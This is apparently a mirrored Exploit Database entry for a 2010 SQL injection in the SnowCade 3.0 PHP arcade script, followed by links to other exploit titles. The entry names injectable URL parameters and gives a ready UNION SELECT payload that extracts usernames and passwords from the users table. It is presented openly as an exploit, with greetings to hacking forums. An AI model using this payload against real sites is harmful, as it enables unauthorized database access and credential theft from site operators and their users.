SnowCade 3.0 – SQL Injection

Exploit Database
10 阅读

作者： ahwak2000

日期： 2010-06-19
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/13937/

/*
[-] SnowCade v3 SQL Injection Vulnerability [-]


---Date : 2010-06-19
---Author : ahwak2000
---Email : z.u5[at]hotmail.com
[-] Script Info [-]
---Home : http://www.arcadecreate.com/

[-] Vulnerability [-]


http://site.com/[path]/index.php?action=browse&cat=[SQL INj]



http://site.com/[path]/index.php?action=playgame&gameid=[SQL INj]



http://site.com/[path]/index.php?action=browse&cat=[SQL INj]



[-] DEM0[-]
http://server/snowcade/index.php?action=browse&cat=31%20UNION%20SELECT%201,CONCAT_WS%28CHAR%2832,58,32%29,username,password%29,3,4,5,6+from+users%20limit%201,1--

[-] Greetz to [-]

To All Friends in V4-team Forums And pc.pirate
*/

last Exploits
SnowCade 3.0 – SQL Injection的更多信息

Solar-Log 500 2.8.2 – Incorrect Access Control：
Xataface – Admin Authentication Bypass：
Simple College Website 1.0 – ‘name’ Sql Injection (Authentication Bypass)：
Allied Telesis AT-RG634A ADSL Broadband Router – Web Shell：
superlink script 1.0 – ‘id’ SQL Injection：
osCMax 2.5 – ‘/admin/stats_monthly_sales.php?status’ SQL Injection：
Dental Clinic Appointment Reservation System 1.0 – Authentication Bypass (SQLi)：
Chartered Accountant Booking Script 1.0 – ‘city’ SQL Injection：